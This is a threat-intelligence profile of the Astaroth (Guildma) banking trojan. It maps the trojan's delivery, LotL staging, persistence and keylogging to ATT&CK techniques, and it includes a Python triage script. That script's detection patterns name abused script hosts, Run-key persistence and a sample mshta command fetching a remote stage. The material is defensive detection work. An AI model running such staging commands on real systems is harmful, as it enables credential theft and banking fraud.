
Threat Actor Characterization

Astaroth

ID: 044a96fadc565be928d1a153f4f76ac625719
Categories: Crimeware, Banking Malware, Spyware/Stealer, Trojan
Threat types: Malware, Cybercrime, Credential theft, Banking Fraud, Latin American
Unknown
Updated: 2026-02-26
Created: 2026-02-26
Aliases: Guildma
MITRE ATT&CK®

Astaroth (aka Guildma) is a long-running Latin American banking trojan ecosystem characterized by modular payloads, heavy obfuscation, and extensive living-off-the-land staging using native Windows tools and scripts. Public research describes resilient configuration and delivery pivots via legitimate platforms (cloud services, GitHub/YouTube), and recent government reporting (Jan 2026) describes a WhatsApp-based propagation evolution using ZIP/LNK/HTA/VBS/MSI lures. The malware monitors banking activity and uses credential theft (including keylogging and credential tools) to enable fraud. Defenders should prioritize script and LotL abuse detections, messaging attachment hygiene, and a dynamic IOC lifecycle due to high infrastructure churn.


Technique   Name                                   Tactic(s)                                   Evidence

T1566.001   Spearphishing Attachment               TA0001 Initial Access
  • 2020-03-23: Phishing-based delivery leading to a multi-stage execution chain.
  • 2026-01-16: Messaging/attachment delivery (ZIP/LNK/MSI/HTA/VBS) in recent campaigns.
T1204.002   Malicious File                         TA0002 Execution
  • 2026-01-16: User execution of the received archives, shortcuts or scripts is required to trigger the chain.
T1059.005   Visual Basic                           TA0002 Execution
  • 2026-01-16: Use of VBScript and HTA in staged delivery.
T1218.005   Mshta                                  TA0005 Defense Evasion
  • 2020-03-23: Abuse of mshta.exe and other signed binaries as part of the living-off-the-land chain.
T1105       Ingress Tool Transfer                  TA0011 Command and Control
  • 2020-03-23: Download of components using native tools (LotL) as part of the chain.
T1071.001   Web Protocols                          TA0011 Command and Control
  • 2026-01-16: HTTP POST beaconing and C2 domain usage reported in the government alert.
T1547.001   Registry Run Keys / Startup Folder     TA0003 Persistence, TA0004 Privilege Escalation
  • 2026-01-16: Run key persistence listed as a suspicious indicator in the guidance.
T1056.001   Keylogging                             TA0006 Credential Access, TA0009 Collection
  • 2026-01-16: Keylogging and credential capture during banking site access.
T1027       Obfuscated Files or Information        TA0005 Defense Evasion
  • 2020-05-11: Obfuscation and anti-analysis techniques described by Talos.
T1583.006   Web Services                           TA0042 Resource Development
  • 2025-10-10: Use of third-party services such as ngrok for communications (treated as an infrastructure technique).
T1583.001   Domains                                TA0042 Resource Development
  • 2024-02-20: Abuse of cloud services (Cloud Run) for delivery described by Talos.
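The summary above tells defenders to prioritize script and living-off-the-land abuse detections. The following is an added example, not code from the profile or from any vendor, showing how the technique mapping in the table can be turned into triage logic over endpoint telemetry: it scores process-creation and registry events for script hosts launched from a user context (T1218.005, T1059.005, T1204.002), script hosts fetching remote content (T1105) and Run-key persistence pointing at a script (T1547.001), then reports hosts where staging is followed by a C2 or persistence step. The event field names (`type`, `host`, `image`, `parent_image`, `command_line`, `key`, `details`), the parent-process list and all sample events are constructed assumptions for this example and should be adapted to the telemetry format in use.

```python
"""Added example: triage of constructed endpoint events against the
ATT&CK techniques listed for Astaroth/Guildma. Field names, lists and
sample events are assumptions for this example, not vendor formats."""
import re
from typing import Dict, List

# Signed Windows script hosts abused in the LotL chain (T1218.005 / T1059.005).
LOTL_SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe"}
# Parents that mean a user opened something (mail/IM/explorer); assumed list.
USER_LAUNCH_PARENTS = {"explorer.exe", "outlook.exe", "whatsapp.exe"}
# Lure file types named in the profile (ZIP/LNK/HTA/VBS/MSI).
LURE_EXT = re.compile(r"\.(zip|lnk|hta|vbs|msi)\b", re.IGNORECASE)
URL = re.compile(r"https?://", re.IGNORECASE)
RUN_KEY = re.compile(r"\\CurrentVersion\\Run\\", re.IGNORECASE)

STAGING = {"T1218.005", "T1059.005", "T1204.002"}
FOLLOW_ON = {"T1105", "T1547.001"}


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path or command token."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev: Dict[str, str]) -> List[str]:
    """Return the technique IDs matched by one event (empty list = no finding)."""
    hits: List[str] = []
    if ev.get("type") == "process_create":
        image = _base(ev.get("image", ""))
        parent = _base(ev.get("parent_image", ""))
        cmd = ev.get("command_line", "")
        user_launched = parent in USER_LAUNCH_PARENTS
        user_path = "\\users\\" in cmd.lower()
        # Script hosts run from system paths by admin tooling are left alone;
        # a user-context launch or a script under a user profile is the signal.
        if image in LOTL_SCRIPT_HOSTS and (user_launched or user_path):
            hits.append("T1218.005" if image == "mshta.exe" else "T1059.005")
            if user_launched and LURE_EXT.search(cmd):
                hits.append("T1204.002")
            if URL.search(cmd):
                hits.append("T1105")
    elif ev.get("type") == "registry_set":
        details = ev.get("details", "")
        first_token = (details.split() or [""])[0]
        if RUN_KEY.search(ev.get("key", "")) and (
            _base(first_token) in LOTL_SCRIPT_HOSTS or LURE_EXT.search(details)
        ):
            hits.append("T1547.001")
    return hits


def triage(events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Aggregate matched technique IDs per host, sorted for stable output."""
    findings: Dict[str, set] = {}
    for ev in events:
        for tid in score_event(ev):
            findings.setdefault(ev["host"], set()).add(tid)
    return {host: sorted(tids) for host, tids in findings.items()}


def hosts_with_chain(findings: Dict[str, List[str]]) -> List[str]:
    """Hosts where a staging technique is followed by C2 or persistence."""
    return sorted(
        host for host, tids in findings.items()
        if set(tids) & STAGING and set(tids) & FOLLOW_ON
    )


# Constructed sample events (not real telemetry); paths and names are made up.
SAMPLE_EVENTS = [
    {"type": "process_create", "host": "WS01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": r'mshta.exe "C:\Users\ana\Downloads\Comprovante.hta"'},
    {"type": "process_create", "host": "WS01", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "command_line": r"wscript.exe //e:vbscript C:\Users\ana\AppData\Local\Temp\recibo.vbs"},
    {"type": "registry_set", "host": "WS01",
     "key": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\SysUpd",
     "details": r"wscript.exe C:\Users\ana\AppData\Roaming\SysUpd.vbs"},
    {"type": "process_create", "host": "WS02", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\svchost.exe", "command_line": "svchost.exe -k netsvcs"},
    {"type": "process_create", "host": "WS02", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\cscript.exe",
     "command_line": r"cscript.exe C:\Windows\System32\slmgr.vbs /dlv"},
    {"type": "process_create", "host": "WS03", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe http://example.invalid/stage"},
]

if __name__ == "__main__":
    found = triage(SAMPLE_EVENTS)
    for host, tids in found.items():
        print(host, ", ".join(tids))
    print("chain on:", hosts_with_chain(found))
```

The benign `cscript.exe` run of `slmgr.vbs` on WS02 produces no finding because it is neither launched from a user-context parent nor pointed at a script under a user profile, which keeps routine administration out of the queue; tuning `USER_LAUNCH_PARENTS` to the messaging clients actually deployed is the main site-specific adjustment.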
Strategic Intelligence

Astaroth (Guildma)

Classification: Unclassified / Open Source Intelligence (OSINT) — TLP:WHITE

Hunting Playbook — Astaroth (Guildma) (Phishing/IM → LotL Staging → Credential Theft)
IOC Appendix — Astaroth (Guildma) (TLP:WHITE)
OSINT Library — Astaroth (Guildma)


2026-01-16 — ECUCERT (Ecuador) — “Alerta AL-2026-002: Malware Astaroth (PDF)”